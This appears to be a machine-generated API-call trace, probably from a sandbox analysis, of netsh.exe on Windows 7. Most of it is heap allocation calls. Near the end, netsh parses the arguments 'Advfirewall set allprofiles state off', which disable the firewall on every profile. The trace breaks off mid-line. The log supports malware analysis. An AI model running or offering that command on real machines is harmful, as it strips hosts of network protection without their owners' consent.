[0192.275] GetProcessHeap () returned 0x2b0000 [0192.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fa4d0 | out: hHeap=0x2b0000) returned 1 [0192.275] RegisterContext () returned 0x0 [0192.275] GetProcessHeap () returned 0x2b0000 [0192.275] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c0) returned 0x30b4e0 [0192.275] GetProcessHeap () returned 0x2b0000 [0192.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fd880 | out: hHeap=0x2b0000) returned 1 [0192.275] RegisterContext () returned 0x0 [0192.275] GetProcessHeap () returned 0x2b0000 [0192.275] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x230) returned 0x30b9d0 [0192.275] GetProcessHeap () returned 0x2b0000 [0192.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b4e0 | out: hHeap=0x2b0000) returned 1 [0192.275] RegisterContext () returned 0x0 [0192.275] GetProcessHeap () returned 0x2b0000 [0192.275] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2a0) returned 0x30b4e0 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b9d0 | out: hHeap=0x2b0000) returned 1 [0192.276] RegisterContext () returned 0x0 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc080 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0192.276] RegisterContext () returned 0x0 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2fa4d0 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc080 | out: hHeap=0x2b0000) returned 1 [0192.276] RegisterContext () returned 0x0 [0192.276] RegisterContext () returned 0x0 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x310) returned 0x30b9d0 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b4e0 | out: hHeap=0x2b0000) returned 1 [0192.276] RegisterContext () returned 0x0 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x380) returned 0x316820 [0192.276] GetProcessHeap () returned 0x2b0000 [0192.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b9d0 | out: hHeap=0x2b0000) returned 1 [0192.277] RegisterContext () returned 0x0 [0192.277] GetProcessHeap () returned 0x2b0000 [0192.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x540) returned 0x30b9d0 [0192.277] GetProcessHeap () returned 0x2b0000 [0192.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x316340 | out: hHeap=0x2b0000) returned 1 [0192.277] RegisterContext () returned 0x0 [0192.277] GetProcessHeap () returned 0x2b0000 [0192.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5b0) returned 0x316bb0 [0192.277] GetProcessHeap () returned 0x2b0000 [0192.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30b9d0 | out: hHeap=0x2b0000) returned 1 [0192.277] RegisterContext () returned 0x0 [0192.277] GetProcessHeap () returned 0x2b0000 [0192.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x620) returned 0x317170 [0192.277] GetProcessHeap () returned 0x2b0000 [0192.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x316bb0 | out: hHeap=0x2b0000) returned 1 [0192.277] RegisterContext () returned 0x0 [0192.277] GetProcessHeap () returned 0x2b0000 [0192.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc080 [0192.278] GetProcessHeap () returned 0x2b0000 [0192.278] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0192.278] RegisterContext () returned 0x0 [0192.278] GetProcessHeap () returned 0x2b0000 [0192.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x690) returned 0x3177a0 [0192.278] GetProcessHeap () returned 0x2b0000 [0192.278] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x317170 | out: hHeap=0x2b0000) returned 1 [0192.364] RegisterContext () returned 0x0 [0192.364] GetProcessHeap () returned 0x2b0000 [0192.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x700) returned 0x31f7e0 [0192.364] GetProcessHeap () returned 0x2b0000 [0192.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3177a0 | out: hHeap=0x2b0000) returned 1 [0192.780] RegisterContext () returned 0x0 [0192.781] GetProcessHeap () returned 0x2b0000 [0192.781] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc480 [0192.781] GetProcessHeap () returned 0x2b0000 [0192.781] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0193.020] RegisterContext () returned 0x0 [0193.021] GetProcessHeap () returned 0x2b0000 [0193.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2faa70 [0193.021] GetProcessHeap () returned 0x2b0000 [0193.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc480 | out: hHeap=0x2b0000) returned 1 [0193.021] RegisterContext () returned 0x0 [0193.021] GetProcessHeap () returned 0x2b0000 [0193.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x770) returned 0x338380 [0193.021] GetProcessHeap () returned 0x2b0000 [0193.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f7e0 | out: hHeap=0x2b0000) returned 1 [0193.021] RegisterContext () returned 0x0 [0193.021] GetProcessHeap () returned 0x2b0000 [0193.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc480 [0193.021] GetProcessHeap () returned 0x2b0000 [0193.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0193.021] RegisterContext () returned 0x0 [0193.021] GetProcessHeap () returned 0x2b0000 [0193.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2fab60 [0193.021] GetProcessHeap () returned 0x2b0000 [0193.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc480 | out: hHeap=0x2b0000) returned 1 [0193.021] RegisterContext () returned 0x0 [0193.022] RegisterContext () returned 0x0 [0193.022] RegisterContext () returned 0x0 [0193.022] GetProcessHeap () returned 0x2b0000 [0193.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e0) returned 0x338b00 [0193.023] GetProcessHeap () returned 0x2b0000 [0193.023] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x338380 | out: hHeap=0x2b0000) returned 1 [0193.282] RegisterContext () returned 0x0 [0193.282] GetProcessHeap () returned 0x2b0000 [0193.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x850) returned 0x3392f0 [0193.282] GetProcessHeap () returned 0x2b0000 [0193.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x338b00 | out: hHeap=0x2b0000) returned 1 [0193.282] RegisterContext () returned 0x0 [0193.282] GetProcessHeap () returned 0x2b0000 [0193.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c0) returned 0x338380 [0193.282] GetProcessHeap () returned 0x2b0000 [0193.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3392f0 | out: hHeap=0x2b0000) returned 1 [0193.283] RegisterContext () returned 0x0 [0193.283] GetProcessHeap () returned 0x2b0000 [0193.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc480 [0193.283] GetProcessHeap () returned 0x2b0000 [0193.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0193.601] RegisterContext () returned 0x0 [0193.601] GetProcessHeap () returned 0x2b0000 [0193.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2fad60 [0193.601] GetProcessHeap () returned 0x2b0000 [0193.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc480 | out: hHeap=0x2b0000) returned 1 [0193.601] RegisterContext () returned 0x0 [0193.601] GetProcessHeap () returned 0x2b0000 [0193.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x150) returned 0x31f7e0 [0193.601] GetProcessHeap () returned 0x2b0000 [0193.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fad60 | out: hHeap=0x2b0000) returned 1 [0193.601] RegisterContext () returned 0x0 [0193.601] GetProcessHeap () returned 0x2b0000 [0193.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c0) returned 0x31f940 [0193.602] GetProcessHeap () returned 0x2b0000 [0193.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f7e0 | out: hHeap=0x2b0000) returned 1 [0193.602] RegisterContext () returned 0x0 [0193.602] GetProcessHeap () returned 0x2b0000 [0193.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc480 [0193.602] GetProcessHeap () returned 0x2b0000 [0193.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0193.605] RegisterContext () returned 0x0 [0193.605] GetProcessHeap () returned 0x2b0000 [0193.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe0) returned 0x2fad60 [0193.605] GetProcessHeap () returned 0x2b0000 [0193.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc480 | out: hHeap=0x2b0000) returned 1 [0193.605] RegisterContext () returned 0x0 [0193.605] GetProcessHeap () returned 0x2b0000 [0193.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x150) returned 0x31f7e0 [0193.605] GetProcessHeap () returned 0x2b0000 [0193.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fad60 | out: hHeap=0x2b0000) returned 1 [0193.605] RegisterContext () returned 0x0 [0193.605] GetProcessHeap () returned 0x2b0000 [0193.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc480 [0193.605] GetProcessHeap () returned 0x2b0000 [0193.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0193.605] RegisterContext () returned 0x0 [0193.605] GetProcessHeap () returned 0x2b0000 [0193.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc500 [0193.606] GetProcessHeap () returned 0x2b0000 [0193.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0193.606] RegisterContext () returned 0x0 [0193.606] GetProcessHeap () returned 0x2b0000 [0193.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x930) returned 0x338c50 [0193.606] GetProcessHeap () returned 0x2b0000 [0193.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x338380 | out: hHeap=0x2b0000) returned 1 [0193.606] RegisterContext () returned 0x0 [0193.606] GetProcessHeap () returned 0x2b0000 [0193.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9a0) returned 0x339590 [0193.606] GetProcessHeap () returned 0x2b0000 [0193.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x338c50 | out: hHeap=0x2b0000) returned 1 [0195.301] RegisterContext () returned 0x0 [0195.302] GetProcessHeap () returned 0x2b0000 [0195.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa10) returned 0x33de10 [0195.302] GetProcessHeap () returned 0x2b0000 [0195.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339590 | out: hHeap=0x2b0000) returned 1 [0195.302] RegisterContext () returned 0x0 [0195.302] GetProcessHeap () returned 0x2b0000 [0195.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2dc680 [0195.302] GetProcessHeap () returned 0x2b0000 [0195.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0195.302] SetConsoleCtrlHandler (HandlerRoutine=0x1359198, Add=1) returned 1 [0195.302] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000 [0195.303] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0195.303] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0195.304] FreeLibrary (hLibModule=0x77940000) returned 1 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-?") returned 52 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-h") returned 52 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="?") returned 34 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="/?") returned 50 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-v") returned 52 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-a") returned 52 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-c") returned 52 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-f") returned 52 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-r") returned 52 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-u") returned 52 [0195.304] _wcsicmp (_String1="Advfirewall", _String2="-p") returned 52 [0195.304] GetVersionExW (in: lpVersionInformation=0x1a7420*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1a7420*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0195.304] _vsnwprintf (in: _Buffer=0x1365b80, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x1a73e8 | out: _Buffer="6.1.7601") returned 8 [0195.304] _vsnwprintf (in: _Buffer=0x1365fa0, _BufferCount=0x103, _Format="%d", _ArgList=0x1a73e8 | out: _Buffer="7601") returned 4 [0195.304] _vsnwprintf (in: _Buffer=0x1365d90, _BufferCount=0x103, _Format="%d", _ArgList=0x1a73e8 | out: _Buffer="1") returned 1 [0195.304] _vsnwprintf (in: _Buffer=0x13661b0, _BufferCount=0x103, _Format="%d", _ArgList=0x1a73e8 | out: _Buffer="0") returned 1 [0195.304] GetProcessHeap () returned 0x2b0000 [0195.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x327100 [0195.304] GetProcessHeap () returned 0x2b0000 [0195.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x327120 [0195.304] GetProcessHeap () returned 0x2b0000 [0195.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x327140 [0195.304] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x327160 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x327180 [0195.305] wcscpy_s (in: _Destination=0x327180, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327140 | out: hHeap=0x2b0000) returned 1 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327120 | out: hHeap=0x2b0000) returned 1 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x327120 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x327140 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4c) returned 0x31d9d0 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3271a0 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3271c0 [0195.305] wcscpy_s (in: _Destination=0x3271c0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339530 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2fdd80 [0195.305] wcscpy_s (in: _Destination=0x2fdd80, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339550 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339570 [0195.305] wcscpy_s (in: _Destination=0x339570, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0195.305] GetProcessHeap () returned 0x2b0000 [0195.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339590 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x3395b0 [0195.306] wcscpy_s (in: _Destination=0x3395b0, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3395d0 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2fdda0 [0195.306] wcscpy_s (in: _Destination=0x2fdda0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31d9d0 | out: hHeap=0x2b0000) returned 1 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327140 | out: hHeap=0x2b0000) returned 1 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x327140 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3395f0 [0195.306] wcscpy_s (in: _Destination=0x3395f0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3271c0 | out: hHeap=0x2b0000) returned 1 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3271a0 | out: hHeap=0x2b0000) returned 1 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3271a0 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3271c0 [0195.306] wcscpy_s (in: _Destination=0x3271c0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3395f0 | out: hHeap=0x2b0000) returned 1 [0195.306] GetProcessHeap () returned 0x2b0000 [0195.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327140 | out: hHeap=0x2b0000) returned 1 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x327140 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2fddb0 [0195.307] wcscpy_s (in: _Destination=0x2fddb0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fdd80 | out: hHeap=0x2b0000) returned 1 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339530 | out: hHeap=0x2b0000) returned 1 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339530 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3395f0 [0195.307] wcscpy_s (in: _Destination=0x3395f0, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339570 | out: hHeap=0x2b0000) returned 1 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339550 | out: hHeap=0x2b0000) returned 1 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339550 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x339570 [0195.307] wcscpy_s (in: _Destination=0x339570, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3395b0 | out: hHeap=0x2b0000) returned 1 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339590 | out: hHeap=0x2b0000) returned 1 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339590 [0195.307] GetProcessHeap () returned 0x2b0000 [0195.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2fdd80 [0195.308] wcscpy_s (in: _Destination=0x2fdd80, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fdda0 | out: hHeap=0x2b0000) returned 1 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3395d0 | out: hHeap=0x2b0000) returned 1 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x30) returned 0x33a530 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x3395d0 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3395b0 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2fdda0 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339610 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x339630 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2fddc0 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x339650 [0195.308] GetProcessHeap () returned 0x2b0000 [0195.308] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x339650, Size=0xe) returned 0x339670 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x339670, Size=0x24) returned 0x337800 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x337800, Size=0x26) returned 0x337830 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x337830, Size=0x2c) returned 0x33a570 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x33a570, Size=0x2e) returned 0x33a5b0 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x33a5b0, Size=0x44) returned 0x31cc90 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x31cc90, Size=0x46) returned 0x31cce0 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x31cce0, Size=0x50) returned 0x31d9d0 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x31d9d0, Size=0x52) returned 0x31da90 [0195.309] GetProcessHeap () returned 0x2b0000 [0195.309] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x31da90, Size=0x58) returned 0x31d9d0 [0195.579] GetProcessHeap () returned 0x2b0000 [0195.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31d9d0 | out: hHeap=0x2b0000) returned 1 [0195.579] _wcsnicmp (_String1="Advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0195.579] _wcsnicmp (_String1="Advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0195.579] _wcsnicmp (_String1="Advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0195.579] _wcsnicmp (_String1="Advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0195.579] _wcsnicmp (_String1="Advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339670 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339650 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x31d9d0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339690 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x3396b0 [0195.580] wcscpy_s (in: _Destination=0x3396b0, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 